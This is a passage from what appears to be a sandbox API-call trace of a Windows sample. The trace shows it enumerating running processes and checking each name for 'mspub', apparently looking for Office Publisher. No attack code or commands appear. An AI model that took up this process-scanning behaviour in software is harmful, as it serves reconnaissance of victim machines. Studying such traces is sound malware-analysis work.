lpMultiByteStr=0x3579518, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.330] StrStrIA (lpFirst="svchost.exe", lpSrch="mspub") returned 0x0 [0097.330] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.333] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579320 [0097.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3579320, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.333] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.333] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mspub") returned 0x0 [0097.333] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.334] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579500 [0097.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3579500, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0097.334] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0097.334] StrStrIA (lpFirst="explorer.exe", lpSrch="mspub") returned 0x0 [0097.334] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0097.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.335] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ac18 [0097.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357ac18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0097.335] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0097.335] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="mspub") returned 0x0 [0097.335] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0097.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.337] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b640 [0097.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b640, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0097.337] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0097.337] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="mspub") returned 0x0 [0097.337] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0097.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.338] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ab98 [0097.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357ab98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0097.338] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0097.338] StrStrIA (lpFirst="Memory Compression", lpSrch="mspub") returned 0x0 [0097.338] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.339] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357a958 [0097.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357a958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0097.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0097.339] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="mspub") returned 0x0 [0097.339] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.340] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579590 [0097.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3579590, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0097.340] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0097.340] StrStrIA (lpFirst="SearchUI.exe", lpSrch="mspub") returned 0x0 [0097.340] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.341] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357ab78 [0097.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357ab78, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0097.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0097.342] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="mspub") returned 0x0 [0097.342] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.343] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35794d0 [0097.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35794d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0097.343] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0097.343] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mspub") returned 0x0 [0097.343] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0097.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.344] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579530 [0097.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3579530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0097.344] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0097.344] StrStrIA (lpFirst="pending.exe", lpSrch="mspub") returned 0x0 [0097.344] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0097.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0097.345] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b668 [0097.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356b668, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0097.345] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0097.345] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="mspub") returned 0x0 [0097.345] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0097.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.348] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a9b8 [0097.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357a9b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0097.348] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0097.348] StrStrIA (lpFirst="swing prefer.exe", lpSrch="mspub") returned 0x0 [0097.348] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0097.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0097.349] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b460 [0097.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b460, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0097.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0097.349] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="mspub") returned 0x0 [0097.349] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0097.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.350] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ac38 [0097.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357ac38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0097.350] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0097.351] StrStrIA (lpFirst="nights-attending.exe", lpSrch="mspub") returned 0x0 [0097.351] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0097.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.352] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579548 [0097.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3579548, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0097.352] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0097.352] StrStrIA (lpFirst="installed.exe", lpSrch="mspub") returned 0x0 [0097.352] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0097.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0097.353] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b758 [0097.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356b758, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0097.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0097.353] StrStrIA (lpFirst="references compounds.exe", lpSrch="mspub") returned 0x0 [0097.353] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0097.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.354] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ac58 [0097.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357ac58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0097.354] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0097.354] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="mspub") returned 0x0 [0097.355] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0097.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.356] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a938 [0097.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357a938, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0097.356] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0097.356] StrStrIA (lpFirst="registered try.exe", lpSrch="mspub") returned 0x0 [0097.356] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0097.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.357] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b708 [0097.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b708, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0097.357] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0097.357] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="mspub") returned 0x0 [0097.357] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0097.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.358] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35792a8 [0097.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35792a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0097.358] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0097.358] StrStrIA (lpFirst="invite.exe", lpSrch="mspub") returned 0x0 [0097.358] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0097.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.360] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35792c0 [0097.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35792c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0097.360] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0097.360] StrStrIA (lpFirst="idol.exe", lpSrch="mspub") returned 0x0 [0097.360] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0097.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.361] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b690 [0097.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b690, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0097.361] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0097.361] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="mspub") returned 0x0 [0097.361] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0097.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", 